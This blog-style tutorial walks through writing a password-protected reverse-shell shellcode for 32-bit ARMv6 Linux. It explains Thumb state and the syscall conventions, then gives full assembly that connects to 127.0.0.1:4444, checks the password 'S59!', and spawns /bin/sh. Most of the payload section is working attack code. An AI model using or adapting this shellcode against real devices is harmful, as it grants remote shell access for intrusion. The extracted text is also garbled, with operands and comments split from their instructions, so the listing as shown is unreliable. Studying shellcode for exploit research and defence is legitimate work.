After having written a I was curious about how to apply this knowledge for other architectures so I decided to go with ARM since it’s an interesting and wide-spread one. similar payload for Linux/Intel x64 About ARM ARM is a Reduced Instruction Set Computing (RISC) processor architecture that is used everywhere these days: mobile phones, smart thermostats, tv’s, wi-fi dongles, cars, credit cards, you name it. How does ARM compare against Intel x86? Here are some key takeaways: Being ARM a RISC processor it has a simplified instruction set that is just a fraction of its 32-bit Intel counterpart, the x86. While on x86 most instructions are allowed to access/operate memory, on ARM the data must be moved from memory into registers before being operated on. Most ARM instructions operate only on registers.Only Load/Store instructions can access memory. ARM has two main instruction set states ARM and Thumb. Thumb instructions are 2 bytes long most of the time while in ARM state instructions are always 4 bytes long. For shellcode writing, Thumb state is the de facto as it saves space and avoids a lot of null bytes. The ARM instruction has a limited range of immediate values available to be used directly with a instruction. If a number is out of this range it can’t be used directly and must, therefore, be split into parts and loaded using several operations/values. mov How do I switch to Thumb state? In order to switch to Thumb state, we can make use of the Branch and Exchange instruction ( ) after having set the destination register’s least significant bit to 1. This can be achieved by adding 1 to the Program Counter ( register) while on ARM state. bx pc <some arm code> ... add r0, pc, # bx r0 <some thumb code> ... // Here we are running on ARM state 1 // Increase value of PC by 1 and place the result into r0 // Branch & Exchange to the address in r0 // This will make the switch to Thumb state because the LSB of r0 = 1 // From here on we can execute Thumb state instructions! From now one all the coding will be done in Thumb state since this is the relevant state for writing shellcode. Setting up the lab First of all, we’ll need a lab to run our tests on. Here are some options for it: You can go for the real deal and test the payload on a real Raspberry Pi 1. 1. You can build/run an emulated environment using Qemu. Since I used the Qemu image from this repo I’d recommend you use . It pretty much works off-the-shelf, don’t worry. 2. armv6_stretch the same setup You could download and use the . 3. VM provided by Azeria Labs Writing the payload Stage One: General Overview First of all, what are we trying to achieve here? Our goal is to write for the Linux 32-bit ARMv6 architecture that will connect back to a remote location over TCP/IPv4 and provide a shell only after the remote client provides a valid password. In order to write the payload, we need to chain several syscalls. The exact order is the following: shellcode We create a new to manage the new connection. socket We to the target address. connect We from the socket and check if the provided password is correct. read We duplicate each standard stream into the new connection stream using the syscall, so the target machine can read and write messages to and from the source machine. dup2 We start a shell by using the syscall. execve Each of these syscalls has a signature we need to address. Certain registers must contain specific values. For example, the register is used to identify the syscall that is executed so it should always contain the . A whole document containing a . r7 syscall number full syscall table can be found here Photo credit: Webaroo.com.au Stage Two: Writing a Syscall Let’s see an example of how to write a syscall in ARM Thumb state. We’ll use the socket syscall: mov r0, # mov r1, # eor r2, r2 c8 mov r7, # add r7, # df svc # // [281] socket(2, 1, 0) 02 20 2 // loads immediate value 2 into r0 01 21 1 // loads immediate value 1 into r1 52 40 // zero-outs r2 by xoring it with itself // 281 is out of range for immediate values // It must be loaded in parts 27 200 // part1: loads immediate value 200 into r7 51 37 81 // part2: adds 81 to r7 as (syscall number) 01 1 // issues the syscall Here you can see: The register being used identifying the syscall r7 Registers , , and used as parameters for the syscall r0 r1 r2 An example of how to deal with immediate values that are out of range The use of instruction to perform a system call svc Stage Three: Writing the full payload Armed with all our knowledge we are now prepared to chain every syscall and put together our payload. The was extracted from the source code on my main repository: following Gist .section .text .global _start _start: .arm add r3, pc, # bx r3 .thumb mov r0, # mov r1, # eor r2, r2 mov r7, # add r7, # svc # mov r10, r0 adr r1, target strb r2, [r1, # ] strb r2, [r1, # ] strb r2, [r1, # ] mov r2, # add r7, # svc # push {r1} mov r1, sp mov r2, # mov r7, # read_pass: mov r0, r10 svc # check_pass: ldr r3, pass ldr r4, [r1] eor r3, r3, r4 bne read_pass mov r1, # mov r7, # loop_stdio: mov r0, r10 svc # sub r1,# bpl loop_stdio adr r0, command eor r2, r2 eor r1, r1 strb r2, [r0, # ] mov r7, # svc # target: .ascii .ascii .byte , , , command: .ascii pass: .ascii // Password-Protected Reverse Shell Linux/ARMv6 // Author: Alan Vivona // medium.syscall59.com // @syscall59 1 // switch to thumb mode // [281] socket(2, 1, 0) 2 1 200 81 1 // save sockfd into r10 // [283] connect(socketfd, target, addrlen) // socket fd is in r0 already 1 // replace the 0xff value of the protocol field with a 0x00 5 // replace the 1st '255' values of the IP field with a 0 6 // replace the 2nd '255' values of the IP field with a 0 16 2 // 281 + 2 = 283 1 // [003] read(sourcefd, destbuffer, amount) 4 3 1 // [063] dup2(sockfd, stdIO) 2 // r1 = 2 (stderr) 63 // r7 = 63 (dup2) // r0 = saved sockfd 1 1 // loop while r1 >= 0 // [011] execve(command, 0, 0) 7 11 1 // 2 bytes aligment fix if needed (can't use a nop as it has a null byte) // align_bytes : .byte 0xff, 0xff // The 0xff will be replaced with a null on runtime "\x02\xff" // Protocol: IPv4/TCP. "\x11\x5c" // Port : 4444 // The '255' will be replaced with a 0 on runtime 127 255 255 1 // IP: 127.0.0.1. "/bin/sh?" // The '?' will be replaced with a null on runtime "S59!" Testing When testing the payload take in consideration that it was crafted for Linux 32-bit ARMv6 (the same chip the Raspberry Pi 1 has). Some quirks may be needed for it to work on other platforms/architectures. In the following video, you can see the whole process of booting up the Qemu armv6 image, assembly of the payload and, finally, the test: https://vimeo.com/331280681 That’s all! Hope you enjoyed this one! The full source code can be found on repo and . Follow me on and for more content like this! my GitHub Exploit-DB Twitter Medium